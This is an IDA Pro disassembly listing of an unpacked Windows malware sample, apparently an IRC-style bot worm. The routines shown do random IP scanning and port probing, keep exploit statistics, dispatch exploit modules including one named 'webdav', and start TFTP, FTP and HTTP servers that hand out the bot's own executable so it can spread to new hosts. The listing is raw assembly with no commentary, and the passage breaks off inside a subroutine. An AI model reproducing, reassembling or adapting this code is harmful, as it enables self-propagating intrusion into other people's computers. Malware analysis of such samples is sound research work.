;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 37249E39E53E3E0FCCEF1E8E6987D367
; File Name : u:\work\37249e39e53e3e0fccef1e8e6987d367_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0001D8C4 ( 121028.)
; Section size in file : 0001D8C4 ( 121028.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_4078FA+4834�p
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset aScanExploitSta ; "[SCAN]: Exploit Statistics:"
push eax
xor ebx, ebx
call sub_412BB5
cmp dword_42A068, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40106E
push esi
mov esi, offset dword_42A070
loc_401033: ; CODE XREF: sub_401000+6B�j
mov eax, [esi]
push eax
add ebx, eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset aSD ; " %s: %d,"
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push eax
call sub_412A80
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_401033
pop esi
loc_40106E: ; CODE XREF: sub_401000+2B�j
push dword_479BB0
call sub_40FD16
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push eax
call sub_412A80
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
lea eax, [ebp+var_200]
push eax
call sub_401C33
add esp, 38h
pop edi
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010CA proc near ; CODE XREF: sub_4078FA+4154�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 9
call sub_4110DA
test eax, eax
pop ecx
jle short loc_401106
mov eax, [ebp+arg_C]
push dword_42D700[eax*8]
call dword_433520 ; inet_ntoa
push eax
lea eax, [ebp+var_200]
push offset aScanCurrentIpS ; "[SCAN]: Current IP: %s."
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_401119
; ---------------------------------------------------------------------------
loc_401106: ; CODE XREF: sub_4010CA+13�j
lea eax, [ebp+var_200]
push offset aScanScanNotAct ; "[SCAN]: Scan not active."
push eax
call sub_412BB5
pop ecx
pop ecx
loc_401119: ; CODE XREF: sub_4010CA+3A�j
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
lea eax, [ebp+var_200]
push eax
call sub_401C33
add esp, 18h
leave
retn
sub_4010CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401141 proc near ; CODE XREF: sub_4018D1+52�p
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_94 = byte ptr 9Ch
arg_114 = byte ptr 11Ch
arg_194 = dword ptr 19Ch
arg_1B4 = dword ptr 1BCh
arg_1BC = dword ptr 1C4h
arg_1C0 = dword ptr 1C8h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_1B4]
cmp eax, 0FFFFFFFFh
jz locret_4014F1
imul eax, 3Ch
push ebx
xor ebx, ebx
cmp dword_42A074[eax], ebx
push esi
jz loc_4013DF
push 5
call sub_4110DA
test eax, eax
pop ecx
jnz loc_4014EF
mov eax, dword_42AE44
push edi
push 104h
mov edi, offset dword_42ED14
push edi
push ebx
mov dword_42EF24, eax
mov dword_42EF20, ebx
call ds:dword_41F010 ; GetModuleFileNameA
push 103h
push offset byte_42AED0
mov esi, offset dword_42EE18
push esi
call sub_412C40
mov eax, [ebp+arg_194]
add esp, 0Ch
cmp [ebp+arg_114], bl
mov dword_42ED10, eax
mov eax, [ebp+arg_1BC]
mov dword_42EFA8, eax
push 7Fh
jnz short loc_4011F4
lea eax, [ebp+arg_94]
push eax
push offset dword_42EF28
call sub_412C40
mov dword_42EFAC, 1
jmp short loc_40120B
; ---------------------------------------------------------------------------
loc_4011F4: ; CODE XREF: sub_401141+94�j
lea eax, [ebp+arg_114]
push eax
push offset dword_42EF28
call sub_412C40
mov dword_42EFAC, ebx
loc_40120B: ; CODE XREF: sub_401141+B1�j
add esp, 0Ch
push esi
push edi
push dword_42EF24
lea eax, [ebp+var_204]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_410EEA
add esp, 20h
mov dword_42EF1C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_42ED10
push offset sub_410A22
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
mov ecx, dword_42EF1C
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz loc_401327
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset aTftpFailedToSt ; "[TFTP]: Failed to start server, error: "...
push eax
call sub_412BB5
add esp, 0Ch
loc_40128A: ; CODE XREF: sub_401141+1EE�j
lea eax, [ebp+var_204]
push eax
call sub_401C33
pop ecx
call ds:dword_41F004 ; GetTickCount
xor edx, edx
mov ecx, 0F82Fh
div ecx
push 104h
mov edi, offset dword_42EA6C
push edi
push ebx
mov dword_42EC78, ebx
add edx, 400h
mov dword_42EC7C, edx
call ds:dword_41F010 ; GetModuleFileNameA
push 103h
push offset byte_42AED0
mov esi, offset dword_42EB70
push esi
call sub_412C40
mov eax, [ebp+arg_194]
add esp, 0Ch
cmp [ebp+arg_114], bl
mov dword_42EA68, eax
mov eax, [ebp+arg_1BC]
mov dword_42ED00, eax
push 7Fh
jnz short loc_401334
lea eax, [ebp+arg_94]
push eax
push offset dword_42EC80
call sub_412C40
mov dword_42ED04, 1
jmp short loc_40134B
; ---------------------------------------------------------------------------
loc_40131F: ; CODE XREF: sub_401141+1EC�j
push 32h
call ds:dword_41F000 ; Sleep
loc_401327: ; CODE XREF: sub_401141+128�j
cmp dword_42EFB0, ebx
jz short loc_40131F
jmp loc_40128A
; ---------------------------------------------------------------------------
loc_401334: ; CODE XREF: sub_401141+1BF�j
lea eax, [ebp+arg_114]
push eax
push offset dword_42EC80
call sub_412C40
mov dword_42ED04, ebx
loc_40134B: ; CODE XREF: sub_401141+1DC�j
add esp, 0Ch
push esi
push edi
push dword_42EC7C
push dword_42EA68
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_204]
push offset aFtpServerStart ; "[FTP]: Server started on: %s:%d, File: "...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+var_204]
push 6
push eax
call sub_410EEA
add esp, 24h
mov dword_42EC74, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_42EA68
push offset sub_402B1D
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
mov ecx, dword_42EC74
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
pop edi
jnz short loc_4013D2
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aFtpFailedToSta ; "[FTP]: Failed to start server, error: <"...
jmp loc_4014D3
; ---------------------------------------------------------------------------
loc_4013CA: ; CODE XREF: sub_401141+297�j
push 32h
call ds:dword_41F000 ; Sleep
loc_4013D2: ; CODE XREF: sub_401141+276�j
cmp dword_42ED08, ebx
jz short loc_4013CA
jmp loc_4014E2
; ---------------------------------------------------------------------------
loc_4013DF: ; CODE XREF: sub_401141+25�j
cmp dword_42A078[eax], ebx
jz loc_4014EF
push 4
call sub_4110DA
test eax, eax
pop ecx
jnz loc_4014EF
push 104h
mov esi, offset dword_42E944
push esi
push ebx
call ds:dword_41F010 ; GetModuleFileNameA
push 5Ch
push esi
call sub_412C10
cmp eax, ebx
pop ecx
pop ecx
jz short loc_40141D
mov [eax], bl
loc_40141D: ; CODE XREF: sub_401141+2D8�j
mov eax, dword_42AE48
mov dword_42EA48, eax
lea eax, [ebp+arg_94]
push eax
push offset dword_42E6BC
mov dword_42EA5C, ebx
call sub_412BB5
mov eax, [ebp+arg_194]
pop ecx
pop ecx
mov ecx, [ebp+arg_1BC]
push esi
push dword_42EA48
mov dword_42EA54, ecx
mov ecx, [ebp+arg_1C0]
push eax
mov dword_42E6B8, eax
mov dword_42EA58, ecx
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_204]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_410EEA
add esp, 20h
loc_401495: ; DATA XREF: .data:off_42BB98�o
; .data:off_42C450�o
mov dword_42EA50, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_42E6B8
push offset sub_403E06
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
mov ecx, dword_42EA50
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz short loc_4014FB
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aHttpdFailedToS ; "[HTTPD]: Failed to start server, error:"...
loc_4014D3: ; CODE XREF: sub_401141+284�j
lea eax, [ebp+var_204]
push eax
call sub_412BB5
add esp, 0Ch
loc_4014E2: ; CODE XREF: sub_401141+299�j
; sub_401141+3C2�j
lea eax, [ebp+var_204]
push eax
call sub_401C33
pop ecx
loc_4014EF: ; CODE XREF: sub_401141+35�j
; sub_401141+2A4�j ...
pop esi
pop ebx
locret_4014F1: ; CODE XREF: sub_401141+12�j
leave
retn
; ---------------------------------------------------------------------------
loc_4014F3: ; CODE XREF: sub_401141+3C0�j
push 32h
call ds:dword_41F000 ; Sleep
loc_4014FB: ; CODE XREF: sub_401141+384�j
cmp dword_42EA64, ebx
jz short loc_4014F3
jmp short loc_4014E2
sub_401141 endp
; =============== S U B R O U T I N E =======================================
sub_401505 proc near ; CODE XREF: sub_40169B:loc_4016FD�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
lea esi, ds:42D700h[esi*8]
push dword ptr [esi]
call dword_433570 ; ntohl
inc eax
push eax
call dword_4335C4 ; ntohl
mov [esi], eax
pop esi
retn
sub_401505 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401525 proc near ; CODE XREF: sub_40169B+5A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push edi
or edi, 0FFFFFFFFh
mov [ebp+var_4], edi
mov [ebp+var_C], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
lea ecx, [eax+1]
loc_401541: ; CODE XREF: sub_401525+21�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401541
sub eax, ecx
cmp eax, 0Fh
jbe short loc_401556
xor eax, eax
jmp loc_4015FB
; ---------------------------------------------------------------------------
loc_401556: ; CODE XREF: sub_401525+28�j
push esi
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_412D93
add esp, 18h
cmp [ebp+var_4], edi
jnz short loc_4015A0
call sub_412D71
mov esi, 0FFh
jmp short loc_40158D
; ---------------------------------------------------------------------------
loc_401588: ; CODE XREF: sub_401525+79�j
call sub_412D71
loc_40158D: ; CODE XREF: sub_401525+61�j
cdq
mov ecx, esi
idiv ecx
push edx
mov [ebp+var_4], edx
call sub_41013C
test al, al
pop ecx
jnz short loc_401588
loc_4015A0: ; CODE XREF: sub_401525+55�j
cmp [ebp+var_C], edi
mov esi, 100h
jnz short loc_4015B7
call sub_412D71
cdq
mov ecx, esi
idiv ecx
mov [ebp+var_C], edx
loc_4015B7: ; CODE XREF: sub_401525+83�j
cmp [ebp+var_8], edi
jnz short loc_4015C7
call sub_412D71
cdq
idiv esi
mov [ebp+var_8], edx
loc_4015C7: ; CODE XREF: sub_401525+95�j
mov edx, [ebp+var_10]
cmp edx, edi
pop esi
jnz short loc_4015DD
call sub_412D71
cdq
mov ecx, 0FEh
idiv ecx
inc edx
loc_4015DD: ; CODE XREF: sub_401525+A8�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
shl edx, 8
add edx, [ebp+var_8]
shl edx, 8
add edx, [ebp+var_C]
shl edx, 8
add eax, edx
mov dword_42D700[ecx*8], eax
loc_4015FB: ; CODE XREF: sub_401525+2C�j
pop edi
leave
retn
sub_401525 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015FE proc near ; CODE XREF: sub_40169B+A9�p
; sub_4028A8+2C�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
push ebx
inc edi
push edi
push 2
mov [ebp+var_4], edi
call dword_4334A0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_401627
xor eax, eax
jmp short loc_401696
; ---------------------------------------------------------------------------
loc_401627: ; CODE XREF: sub_4015FE+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_4335EC ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_433444 ; ioctlsocket
push 10h
lea eax, [ebp+var_1C]
push eax
push esi
call dword_433458 ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push ebx
lea eax, [ebp+var_120]
push eax
push ebx
push ebx
mov [ebp+var_8], ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_433544 ; select
push esi
mov edi, eax
call dword_4335AC ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_401696: ; CODE XREF: sub_4015FE+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_4015FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40169B proc near ; DATA XREF: sub_4018D1+144�o
var_3B0 = dword ptr -3B0h
var_394 = dword ptr -394h
var_390 = byte ptr -390h
var_380 = byte ptr -380h
var_300 = dword ptr -300h
var_2FC = byte ptr -2FCh
var_27C = byte ptr -27Ch
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_254 = byte ptr -254h
var_1D4 = byte ptr -1D4h
var_1C4 = byte ptr -1C4h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 74h
mov esi, eax
pop ecx
lea edi, [ebp+var_1D4]
rep movsd
mov edi, [ebp+var_2C]
mov dword ptr [eax+1CCh], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], edi
mov [ebp+arg_0], eax
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
mov ebx, edi
pop ecx
imul ebx, 234h
jmp loc_4018AD
; ---------------------------------------------------------------------------
loc_4016E7: ; CODE XREF: sub_40169B+220�j
cmp [ebp+var_10], 0
push eax
jz short loc_4016FD
lea eax, [ebp+var_1D4]
push eax
call sub_401525
pop ecx
jmp short loc_401702
; ---------------------------------------------------------------------------
loc_4016FD: ; CODE XREF: sub_40169B+51�j
call sub_401505
loc_401702: ; CODE XREF: sub_40169B+60�j
pop ecx
push [ebp+arg_0]
mov esi, eax
push dword_43433C[ebx]
push [ebp+var_3C]
push esi
call dword_433520 ; inet_ntoa
push eax
lea eax, [ebp+var_254]
push offset aScanIpSDScanTh ; "[SCAN]: IP: %s:%d, Scan thread: %d, Sub"...
push eax
call sub_412BB5
lea eax, [ebp+var_254]
push eax
lea eax, dword_434138[ebx]
push eax
call sub_412BB5
push [ebp+var_38]
push [ebp+var_3C]
push esi
call sub_4015FE
add esp, 2Ch
cmp eax, 1
jnz loc_4018A2
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_4017D6
push offset dword_42E6A0
call ds:dword_41F01C ; RtlEnterCriticalSection
push [ebp+var_3C]
push esi
call dword_433520 ; inet_ntoa
push eax
lea eax, [ebp+var_254]
push offset aScanIpSPortDIs ; "[SCAN]: IP: %s, Port %d is open."
push eax
call sub_412BB5
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_4017B8
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_254]
push eax
lea eax, [ebp+var_C0]
jnz short loc_4017AC
lea eax, [ebp+var_140]
loc_4017AC: ; CODE XREF: sub_40169B+109�j
push eax
push [ebp+var_40]
call sub_4045DD
add esp, 14h
loc_4017B8: ; CODE XREF: sub_40169B+EE�j
lea eax, [ebp+var_254]
push eax
call sub_401C33
mov [esp+3B0h+var_3B0], offset dword_42E6A0
call ds:dword_41F018 ; RtlLeaveCriticalSection
jmp loc_4018A2
; ---------------------------------------------------------------------------
loc_4017D6: ; CODE XREF: sub_40169B+BE�j
push esi
call dword_433520 ; inet_ntoa
push eax
lea eax, [ebp+var_390]
push eax
call sub_412BB5
mov eax, [ebp+var_20]
imul eax, 3Ch
add eax, offset aWebdav ; "webdav"
push eax
lea eax, [ebp+var_27C]
push eax
call sub_412BB5
add esp, 10h
cmp [ebp+var_C0], 0
lea eax, [ebp+var_C0]
jnz short loc_40181A
lea eax, [ebp+var_140]
loc_40181A: ; CODE XREF: sub_40169B+177�j
push eax
lea eax, [ebp+var_2FC]
push eax
call sub_412BB5
mov eax, [ebp+var_144]
pop ecx
mov [ebp+var_300], eax
pop ecx
xor eax, eax
loc_401837: ; CODE XREF: sub_40169B+1AD�j
mov cl, [ebp+eax+var_1C4]
mov [ebp+eax+var_380], cl
inc eax
test cl, cl
jnz short loc_401837
mov eax, [ebp+var_40]
mov [ebp+var_394], eax
mov eax, [ebp+var_18]
mov [ebp+var_260], eax
mov eax, [ebp+var_14]
mov [ebp+var_25C], eax
mov eax, [ebp+var_3C]
mov [ebp+var_270], eax
mov eax, [ebp+var_20]
mov [ebp+var_268], eax
imul eax, 3Ch
sub esp, 140h
push 50h
pop ecx
mov [ebp+var_26C], edi
lea esi, [ebp+var_394]
mov edi, esp
rep movsd
call off_42A06C[eax]
mov edi, [ebp+var_4]
add esp, 140h
loc_4018A2: ; CODE XREF: sub_40169B+B4�j
; sub_40169B+136�j
push 7D0h
call ds:dword_41F000 ; Sleep
loc_4018AD: ; CODE XREF: sub_40169B+47�j
mov eax, dword_43433C[ebx]
cmp dword_42D704[eax*8], 0
jnz loc_4016E7
push edi
call sub_4111AE
pop ecx
push 0
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_40169B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4018D1 proc near ; DATA XREF: sub_4078FA+3C68�o
; sub_4078FA+5643�o
var_304 = dword ptr -304h
var_250 = byte ptr -250h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 250h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 74h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_250]
rep movsd
mov dword ptr [eax+1C8h], 1
lea eax, [ebp+74h+var_250]
push eax
call dword_433514 ; inet_addr
mov ecx, [ebp+74h+var_AC]
sub esp, 1D0h
mov dword_42D700[ecx*8], eax
push 74h
pop ecx
lea esi, [ebp+74h+var_250]
mov edi, esp
rep movsd
call sub_401141
xor ebx, ebx
add esp, 1D0h
cmp [ebp+74h+var_1C0], ebx
jnz short loc_401943
mov eax, dword_432FF4
mov [ebp+74h+var_1C0], eax
loc_401943: ; CODE XREF: sub_4018D1+65�j
push 9
call sub_4110DA
xor edi, edi
inc edi
cmp eax, edi
pop ecx
jnz short loc_4019B3
mov esi, offset dword_42E6A0
push esi
call ds:dword_41F024 ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_41F020 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_4019B3
lea eax, [ebp+74h+var_80]
push offset aScanFailedToIn ; "[SCAN]: Failed to initialize critical s"...
push eax
call sub_412BB5
cmp [ebp+74h+var_90], ebx
pop ecx
pop ecx
jnz short loc_40199D
push ebx
push [ebp+74h+var_94]
lea eax, [ebp+74h+var_80]
push eax
lea eax, [ebp+74h+var_1BC]
push eax
push [ebp+74h+var_BC]
call sub_4045DD
add esp, 14h
loc_40199D: ; CODE XREF: sub_4018D1+B0�j
lea eax, [ebp+74h+var_80]
push eax
call sub_401C33
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
add ebp, 74h
leave
retn 4
; ---------------------------------------------------------------------------
loc_4019B3: ; CODE XREF: sub_4018D1+7F�j
; sub_4018D1+9B�j
cmp [ebp+74h+var_A0], edi
mov eax, [ebp+74h+var_AC]
mov esi, ds:dword_41F000
mov dword_42D704[eax*8], edi
jb loc_401A64
loc_4019CC: ; CODE XREF: sub_4018D1+18D�j
push edi
push [ebp+74h+var_AC]
lea eax, [ebp+74h+var_250]
push [ebp+74h+var_B8]
mov [ebp+74h+var_A4], edi
push eax
lea eax, [ebp+74h+var_80]
push offset aScanSDScanThre ; "[SCAN]: %s:%d, Scan thread: %d, Sub-thr"...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+74h+var_80]
push 9
push eax
call sub_410EEA
mov ecx, [ebp+74h+var_AC]
mov [ebp+74h+var_A8], eax
imul eax, 234h
add esp, 24h
push ebx
push ebx
mov dword_43433C[eax], ecx
lea eax, [ebp+74h+var_250]
push eax
push offset sub_40169B
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+74h+var_A8]
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz short loc_401A7B
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+74h+var_80]
push offset aScanFailedToSt ; "[SCAN]: Failed to start worker thread, "...
push eax
call sub_412BB5
lea eax, [ebp+74h+var_80]
push eax
call sub_401C33
add esp, 10h
loc_401A56: ; CODE XREF: sub_4018D1+1AF�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+74h+var_A0]
jbe loc_4019CC
loc_401A64: ; CODE XREF: sub_4018D1+F5�j
cmp [ebp+74h+var_B0], ebx
jz short loc_401A89
mov eax, [ebp+74h+var_B0]
imul eax, 0EA60h
push eax
call esi ; Sleep
jmp short loc_401A96
; ---------------------------------------------------------------------------
loc_401A77: ; CODE XREF: sub_4018D1+1AD�j
push 1Eh
call esi ; Sleep
loc_401A7B: ; CODE XREF: sub_4018D1+162�j
cmp [ebp+74h+var_84], ebx
jz short loc_401A77
jmp short loc_401A56
; ---------------------------------------------------------------------------
loc_401A82: ; CODE XREF: sub_4018D1+1C3�j
push 7D0h
call esi ; Sleep
loc_401A89: ; CODE XREF: sub_4018D1+196�j
mov eax, [ebp+74h+var_AC]
cmp dword_42D704[eax*8], 1
jz short loc_401A82
loc_401A96: ; CODE XREF: sub_4018D1+1A4�j
push [ebp+74h+var_B0]
mov eax, [ebp+74h+var_AC]
push [ebp+74h+var_B8]
mov eax, dword_42D700[eax*8]
push eax
call dword_433520 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_80]
push offset aScanFinishedAt ; "[SCAN]: Finished at %s:%d after %d minu"...
push eax
call sub_412BB5
add esp, 14h
cmp [ebp+74h+var_90], ebx
jnz short loc_401ADE
push ebx
push [ebp+74h+var_94]
lea eax, [ebp+74h+var_80]
push eax
lea eax, [ebp+74h+var_1BC]
push eax
push [ebp+74h+var_BC]
call sub_4045DD
add esp, 14h
loc_401ADE: ; CODE XREF: sub_4018D1+1F1�j
lea eax, [ebp+74h+var_80]
push eax
call sub_401C33
mov eax, [ebp+74h+var_AC]
mov dword_42D704[eax*8], ebx
mov [esp+290h+var_304], 0BB8h
call esi ; Sleep
push 9
call sub_4110DA
cmp eax, 1
pop ecx
jnz short loc_401B12
push offset dword_42E6A0
call ds:dword_41F024 ; RtlDeleteCriticalSection
loc_401B12: ; CODE XREF: sub_4018D1+234�j
push [ebp+74h+var_AC]
call sub_4111AE
pop ecx
push ebx
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_4018D1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401B23 proc near ; CODE XREF: sub_4078FA+32B1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
xor ebx, ebx
mov edi, offset dword_479030
loc_401B2D: ; CODE XREF: sub_401B23+4D�j
cmp byte ptr [edi], 0
jz short loc_401B74
mov esi, [esp+0Ch+arg_0]
mov eax, edi
loc_401B38: ; CODE XREF: sub_401B23+31�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_401B5A
test cl, cl
jz short loc_401B56
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_401B5A
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_401B38
loc_401B56: ; CODE XREF: sub_401B23+1F�j
xor eax, eax
jmp short loc_401B5F
; ---------------------------------------------------------------------------
loc_401B5A: ; CODE XREF: sub_401B23+1B�j
; sub_401B23+29�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401B5F: ; CODE XREF: sub_401B23+35�j
test eax, eax
jz short loc_401B74
add edi, 0B8h
inc ebx
cmp edi, offset dword_479BB0
jl short loc_401B2D
jmp short loc_401BB5
; ---------------------------------------------------------------------------
loc_401B74: ; CODE XREF: sub_401B23+D�j
; sub_401B23+3E�j
mov esi, ebx
imul esi, 0B8h
push 2Eh
pop ecx
push 17h
push [esp+10h+arg_0]
lea edx, dword_479030[esi]
xor eax, eax
mov edi, edx
push edx
rep stosd
call sub_412C40
push 9Fh
push [esp+1Ch+arg_4]
lea eax, dword_479048[esi]
push eax
call sub_412C40
add esp, 18h
inc dword_42B280
loc_401BB5: ; CODE XREF: sub_401B23+4F�j
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_401B23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401BBB proc near ; CODE XREF: sub_4078FA+461E�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aAliasList ; "-[Alias List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
xor edi, edi
mov esi, offset dword_479030
loc_401BE5: ; CODE XREF: sub_401BBB+72�j
cmp byte ptr [esi], 0
jz short loc_401C20
lea eax, [esi+18h]
push eax
push esi
push edi
push offset aD_SS ; "%d. %s = %s"
lea eax, [ebp+var_200]
push 200h
push eax
call sub_412E0D
push 1
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 2Ch
loc_401C20: ; CODE XREF: sub_401BBB+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_479BB0
jl short loc_401BE5
pop edi
pop esi
leave
retn
sub_401BBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C33 proc near ; CODE XREF: sub_401000+BE�p
